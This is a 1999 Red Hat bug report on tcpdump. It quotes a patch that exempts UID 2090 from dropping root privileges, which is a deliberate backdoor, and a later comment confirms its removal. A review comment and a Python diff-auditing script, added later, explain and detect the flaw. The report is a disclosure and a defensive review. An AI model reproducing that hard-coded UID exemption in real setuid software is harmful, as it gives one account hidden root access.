Bug 7116 - if you have uid 2090 you are a winner if tcpdump is suid root
Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: tcpdump
Version: 6.1
Hardware: All Linux
Priority: medium Severity: medium
Assigned To: Harald Hoyer
Keywords: Security
Reported: 1999-11-18 15:51 EST by lha
Modified: 2008-05-01 11:37 EDT
Last Closed: 1999-12-22 09:52:05 EST
Description lha 1999-11-18 15:51:26 EST
tcpdump-3.4-ss990523.dif.gz

if you have uid 2090 you are a winner if tcpdump is suid root,
and people might do that since it is a nice thing to tcpdump the network
w/o being root.

You never read patches you get?

diff -x rsvpd -x rsvp_print.c --new-file -ur lbl/tcpdump-3.4/tcpdump.c
tcpdump-3.4/tcpdump.c
--- lbl/tcpdump-3.4/tcpdump.c   Sun Oct 19 00:50:17 1997
+++ tcpdump-3.4/tcpdump.c       Wed Mar 17 20:46:21 1999
@@ -134,6 +176,9 @@
        u_char *pcap_userdata;
        char ebuf[PCAP_ERRBUF_SIZE];

+       if (geteuid() == 0 && getuid() != 2090)
+               setuid(getuid());
+
        cnt = -1;
        device = NULL;
        infile = NULL;
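Review bot: the added condition `getuid() != 2090` exempts one hard-coded UID from the privilege drop, so on a setuid-root install the process keeps euid 0 for whoever holds that UID while every other caller is dropped. Remove the UID test so the drop applies to all callers (`if (geteuid() == 0) setuid(getuid());`), or, if some accounts must retain privilege, make that an installation-time decision such as group ownership and file mode of the binary rather than a literal in the source. The return value of `setuid()` on the following line is also ignored; check it and exit on failure so the program never continues with privileges it meant to give up.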
Comment 1 lha 1999-11-22 09:44:59 EST
ok, it might not have been a security hole by itself, but you should still
read the patches you get.

You should consider using www.tcpdump.org instead of old tcpdump 3.4 + random
patches.
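
A patch-review check in the spirit of the comments above, as an added example that is not part of the original bug report or of tcpdump: a Python script that scans the added lines of a unified diff for uid/gid calls compared against a non-zero numeric literal and for `set*id()` calls whose return value is discarded. The function name `audit_diff`, the regular expressions and the sample diff (the hunk from this report, retyped) are assumptions of this example.

```python
import re

# Constructed sample: the hunk quoted in this report, retyped as a unified diff.
SAMPLE_DIFF = """\
--- lbl/tcpdump-3.4/tcpdump.c
+++ tcpdump-3.4/tcpdump.c
@@ -134,6 +176,9 @@
 \tu_char *pcap_userdata;
 \tchar ebuf[PCAP_ERRBUF_SIZE];

+\tif (geteuid() == 0 && getuid() != 2090)
+\t\tsetuid(getuid());
+
 \tcnt = -1;
"""

ID_CALL = r"get(?:e?uid|e?gid)\s*\(\s*\)"
# An identity call compared with a numeric literal, in either operand order.
LITERAL_CMP = re.compile(
    rf"{ID_CALL}\s*[!=]=\s*(\d+)|(\d+)\s*[!=]=\s*{ID_CALL}")
# set*id() used as a bare statement, so its return value is discarded.
BARE_SETID = re.compile(r"^\s*set(?:e|re|res)?[ug]id\s*\(.*\)\s*;")
HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

def audit_diff(text):
    """Return (file, new_line_no, reason, source) for suspicious added lines."""
    findings, path, new_no = [], None, 0
    for line in text.splitlines():
        if line.startswith("+++ "):
            path = line[4:].split("\t")[0].strip()
        elif (m := HUNK.match(line)):
            new_no = int(m.group(1))      # first line number in the new file
        elif line.startswith("+"):
            body = line[1:]
            for m in LITERAL_CMP.finditer(body):
                lit = m.group(1) or m.group(2)
                if int(lit) != 0:         # comparing with 0 (root) is routine
                    findings.append(
                        (path, new_no, f"hard-coded id {lit}", body.strip()))
            if BARE_SETID.match(body):
                findings.append(
                    (path, new_no, "unchecked set*id()", body.strip()))
            new_no += 1
        elif line.startswith(" ") or line == "":
            new_no += 1                   # context line exists in the new file
        # "-" lines and the "--- " header do not advance the new-file counter
    return findings

if __name__ == "__main__":
    for finding in audit_diff(SAMPLE_DIFF):
        print(*finding, sep=": ")
```

A hit is a prompt for a human to read the hunk, not proof of a backdoor; comparisons written with a macro or variable instead of a literal are not matched.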
Comment 2 Jeff Johnson 1999-12-22 09:51:59 EST
The 2090 backdoor has been removed in tcpdump-3.4-17.

The tcpdump.org offering doesn't seem quite stable yet, but I'll probably
upgrade to that version when a stable release is available.
